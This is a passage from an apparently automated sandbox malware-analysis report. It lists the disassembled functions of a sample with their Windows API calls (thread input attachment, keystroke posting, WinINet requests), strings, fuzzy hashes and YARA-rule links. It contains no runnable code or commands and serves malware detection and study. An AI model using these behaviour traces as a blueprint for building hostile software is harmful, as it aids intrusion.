                                          • Opcode ID: e1782025a3b2838c75b98c32b0351370c4c6278639a2e965d73207f51e8916f8
                                          • Instruction ID: 97223d1f27c8c40dfa3129a70fad2361a066279bc4cbae0465fd4efbd5ae2c10
                                          • Opcode Fuzzy Hash: e1782025a3b2838c75b98c32b0351370c4c6278639a2e965d73207f51e8916f8
                                          • Instruction Fuzzy Hash: B241EC32A000279BCB105F7DC8905BE77E5AFEA758B245229E421FF286E731DD81D790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB53A0
                                          • GetDiskFreeSpaceW.KERNEL32 ref: 00EB5416
                                          • GetLastError.KERNEL32 ref: 00EB5420
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB54A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 66080c257d91e04a68380c5e0f189d1bf3b751b5830d9ac7343956cdc4b26ece
                                          • Instruction ID: 0bbb4fc5ee9c83fd06890bc0d1ba6193be72887f5061cb1e4f5a4afd4c2a329d
                                          • Opcode Fuzzy Hash: 66080c257d91e04a68380c5e0f189d1bf3b751b5830d9ac7343956cdc4b26ece
                                          • Instruction Fuzzy Hash: 2A31B036A006059FD710DF68D884BEBBBF4EF45309F149066E416EB292DB71DD86CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EAB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00EAB151
                                          • GetForegroundWindow.USER32 ref: 00EAB165
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00EAB16C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00EAB17B
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EAB18D
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EAB1A6
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00EAB1B8
                                          • AttachThreadInput.USER32(00000000,00000000), ref: 00EAB1FD
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00EAB212
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 00EAB21D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 04ad2d3224992846975bc28a5c81e2d6e5859f776144f2f1f35fd4fbd7369c98
                                          • Instruction ID: f0822bf3b4f0d7e82295bd6f07cec7db2943c219d6b01ddf250a87c85db891df
                                          • Opcode Fuzzy Hash: 04ad2d3224992846975bc28a5c81e2d6e5859f776144f2f1f35fd4fbd7369c98
                                          • Instruction Fuzzy Hash: E431C371501208BFDB109F25EC44BAD7BA9FB5A399F219006F911FA1A1D7B4AD40CF70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E72C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 0ea7052e6284c5cdb9968ca086c152bb3e670ea06441eb6623965e2d45fb8f9e
                                          • Instruction ID: 3a2aae6ce47a1cb69755843b8c97b571b5a9609d963a5aa2637e0a22983ddb2f
                                          • Opcode Fuzzy Hash: 0ea7052e6284c5cdb9968ca086c152bb3e670ea06441eb6623965e2d45fb8f9e
                                          • Instruction Fuzzy Hash: B511A776500108AFCB02EF64D842CDD7BA5FF45350F4594A9FB4C6F222D631EE909B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E41410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E41459
                                          • OleUninitialize.OLE32 ref: 00E414F8
                                          • UnregisterHotKey.USER32(?), ref: 00E416DD
                                          • DestroyWindow.USER32 ref: 00E824B9
                                          • FreeLibrary.KERNEL32 ref: 00E8251E
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E8254B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: ea8927e514f49a25c849ff8b3c5be980ee2c682b2767cb6e8ce18228b879924d
                                          • Instruction ID: 247d0ed9c3b6ab31c48383703fe400d250eeeb04436db2860942dca53c3ab03f
                                          • Opcode Fuzzy Hash: ea8927e514f49a25c849ff8b3c5be980ee2c682b2767cb6e8ce18228b879924d
                                          • Instruction Fuzzy Hash: 66D18A307012128FCB19EF15E499A69F7A0BF05304F2462AEE94E7B262DB30EC52CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EB359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00EB35E4
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • LoadStringW.USER32(00F12390,?,00000FFF,?), ref: 00EB360A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LoadString$_wcslen
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 4099089115-2391861430
                                          • Opcode ID: f94a393468cf298b46d49bdcb374926ecafdedfd1f8a5570ad2780746c09d554
                                          • Instruction ID: 062f3bf06dacd8b8dbb4651591184ac011de47535affbf2acf854f7c22fb30d0
                                          • Opcode Fuzzy Hash: f94a393468cf298b46d49bdcb374926ecafdedfd1f8a5570ad2780746c09d554
                                          • Instruction Fuzzy Hash: 5F517171D00219BADF15EBA0EC42EEEBBB4EF04304F146125F51572192DB316B99DFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                            • Part of subcall function 00E5912D: GetCursorPos.USER32(?), ref: 00E59141
                                            • Part of subcall function 00E5912D: ScreenToClient.USER32(00000000,?), ref: 00E5915E
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E59183
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E5919D
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00ED8B6B
                                          • ImageList_EndDrag.COMCTL32 ref: 00ED8B71
                                          • ReleaseCapture.USER32 ref: 00ED8B77
                                          • SetWindowTextW.USER32 ref: 00ED8C12
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00ED8C25
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00ED8CFF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 1924731296-2107944366
                                          • Opcode ID: 395c5698c7a2297fecf1b8fa5d1284b5133af0da7c964130e5bf13cff2c36e02
                                          • Instruction ID: a169a562c1efb29a4ca07d099ee420b6cc4e5d740f2ed2207c0960e94d552e00
                                          • Opcode Fuzzy Hash: 395c5698c7a2297fecf1b8fa5d1284b5133af0da7c964130e5bf13cff2c36e02
                                          • Instruction Fuzzy Hash: 5451BD70205304AFD714DF14ED56FAAB7E4FB88754F50162EFA52A72E2CB709908CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EBC272
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EBC29A
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EBC2CA
                                          • GetLastError.KERNEL32 ref: 00EBC322
                                          • SetEvent.KERNEL32 ref: 00EBC336
                                          • InternetCloseHandle.WININET(00000000), ref: 00EBC341
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3113390036-3916222277
                                          • Opcode ID: 9014e2d29b3639eae70fa05e23f8fbe997609ae97b66f551bc5af3af50d66ebe
                                          • Instruction ID: 60db359300a64e65523e288ee972d3946d387bf5b4953c92321809d92e7aae95
                                          • Opcode Fuzzy Hash: 9014e2d29b3639eae70fa05e23f8fbe997609ae97b66f551bc5af3af50d66ebe
                                          • Instruction Fuzzy Hash: 17319171608608AFD7219F659C84AEB7BFCEB49784B64951EF486F2210DB34DD058B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32 ref: 00EA98BC
                                          • LoadStringW.USER32(00000000,?,00E83AAF,?), ref: 00EA98C3
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
                                          • MessageBoxW.USER32 ref: 00EA9987
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 858772685-4153970271
                                          • Opcode ID: d3ba866c33aec441cb43705e14ce2e790514772ad6e8c0f1ab1bcb98205c5db6
                                          • Instruction ID: 2576b4bc77724f5333dc225012532664db0eb139bac5c52413cf6227ebac7a06
                                          • Opcode Fuzzy Hash: d3ba866c33aec441cb43705e14ce2e790514772ad6e8c0f1ab1bcb98205c5db6
                                          • Instruction Fuzzy Hash: 90216F3290021AABDF15EF90DC0AEEE77B5FF18300F045466F515760A2DA31A628EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 00EA20AB
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00EA20C0
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EA214D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1290815626-3381328864
                                          • Opcode ID: 1abe62878f475493a2e02de6b2e0fdfc191c28f6f7b68ae1485886910dec67d7
                                          • Instruction ID: 36a9a6f159d9abd93355379aa3cdaef99d2f7e2064395906c36239dd5401f912
                                          • Opcode Fuzzy Hash: 1abe62878f475493a2e02de6b2e0fdfc191c28f6f7b68ae1485886910dec67d7
                                          • Instruction Fuzzy Hash: 2C11EBB66C570779FA012224AC06DE737DCCB1A754B20211AF704B90D1FAA1B8416915
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E7CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 1282221369-0
                                          • Opcode ID: 2d3d047d4e0bd857cfe947ba9c344789368f48dcec5a3a3c97b96a62ef52c38a
                                          • Instruction ID: f3aa07bc893811c36776752ab7f8dbffbb93a8711fb6d340c72557a0443d79de
                                          • Opcode Fuzzy Hash: 2d3d047d4e0bd857cfe947ba9c344789368f48dcec5a3a3c97b96a62ef52c38a
                                          • Instruction Fuzzy Hash: 36616C71A043046FDB29AFB4AC41AAD7BE9EF05314F24E16EFA4CB7281DB319D418750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00ED50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00ED5186
                                          • ShowWindow.USER32(?,00000000), ref: 00ED51C7
                                          • ShowWindow.USER32(?,00000005), ref: 00ED51CD
                                          • SetFocus.USER32 ref: 00ED51D1
                                            • Part of subcall function 00ED6FBA: DeleteObject.GDI32(00000000), ref: 00ED6FE6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED520D
                                          • SetWindowLongW.USER32 ref: 00ED521A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00ED524D
                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00ED5287
                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00ED5296
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                          • String ID:
                                          • API String ID: 3210457359-0
                                          • Opcode ID: 5ee5f043e640fff9802f63288cd71322b959af5090fe02bc63ef3fc48bba9302
                                          • Instruction ID: bb6c7b596e60c810477dbd800c52b5380bac80f325720869d2a81d0a01467c1d
                                          • Opcode Fuzzy Hash: 5ee5f043e640fff9802f63288cd71322b959af5090fe02bc63ef3fc48bba9302
                                          • Instruction Fuzzy Hash: 7F51B032A42A09FEEF209F24CC45BD83BB5EB05365F146013FA24B63E1C371998ADB41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00E58B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32 ref: 00E96890
                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E968A9
                                          • LoadImageW.USER32 ref: 00E968B9
                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E968D1
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E968F2
                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E58874,00000000,00000000,00000000,000000FF,00000000), ref: 00E96901
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E9691E
                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E58874,00000000,00000000,00000000,000000FF,00000000), ref: 00E9692D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                          • String ID:
                                          • API String ID: 1268354404-0
                                          • Opcode ID: ebe2255d40106ef29fda36e1941c4b52d65deadb87561bf40e69b4366d6419ba
                                          • Instruction ID: fe58c51601bd8a988c1cebdfa159795454045e249f7d7e831ea8421b01a003fc
                                          • Opcode Fuzzy Hash: ebe2255d40106ef29fda36e1941c4b52d65deadb87561bf40e69b4366d6419ba
                                          • Instruction Fuzzy Hash: BC519774600209EFDF208F25CC51BAA3BB9FB88765F105919F952B72A0DB70E984DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EBC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EBC182
                                          • GetLastError.KERNEL32 ref: 00EBC195
                                          • SetEvent.KERNEL32 ref: 00EBC1A9
                                            • Part of subcall function 00EBC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EBC272
                                            • Part of subcall function 00EBC253: GetLastError.KERNEL32 ref: 00EBC322
                                            • Part of subcall function 00EBC253: SetEvent.KERNEL32 ref: 00EBC336
                                            • Part of subcall function 00EBC253: InternetCloseHandle.WININET(00000000), ref: 00EBC341
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                          • String ID:
                                          • API String ID: 337547030-0
                                          • Opcode ID: 3959f465c13e919dbf8e7c1975526f0207ae7eadfb636f95af5326793091074b
                                          • Instruction ID: e862237edf43b0c3de7e9b45e75631de607145237dcfd871e1dd27a5ea4e5cb0
                                          • Opcode Fuzzy Hash: 3959f465c13e919dbf8e7c1975526f0207ae7eadfb636f95af5326793091074b
                                          • Instruction Fuzzy Hash: B231AE71205A01EFDB219FB6ED04AA7BBF9FF58344B20541EF956E6620D730E814DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
                                            • Part of subcall function 00EA3A3D: GetCurrentThreadId.KERNEL32 ref: 00EA3A5E
                                            • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA25BD
                                          • PostMessageW.USER32 ref: 00EA25DB
                                          • Sleep.KERNEL32(00000000), ref: 00EA25DF
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA25E9
                                          • PostMessageW.USER32 ref: 00EA2601
                                          • Sleep.KERNEL32(00000000), ref: 00EA2605
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EA260F
                                          • PostMessageW.USER32 ref: 00EA2623
                                          • Sleep.KERNEL32(00000000), ref: 00EA2627
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 2bf182d6245bb70e03e6ce09ed133e6146626363897b8b7c47a716743d6f2550
                                          • Instruction ID: d26dba73aca0b683351b03458e48d0f21d3b053076758dd1a06d3f1ffeb78840
                                          • Opcode Fuzzy Hash: 2bf182d6245bb70e03e6ce09ed133e6146626363897b8b7c47a716743d6f2550
                                          • Instruction Fuzzy Hash: E101D830791320BBFB1067699C8AF597F99DB4EB51F201006F314BF0D1C9E16444CA6A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00EA1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
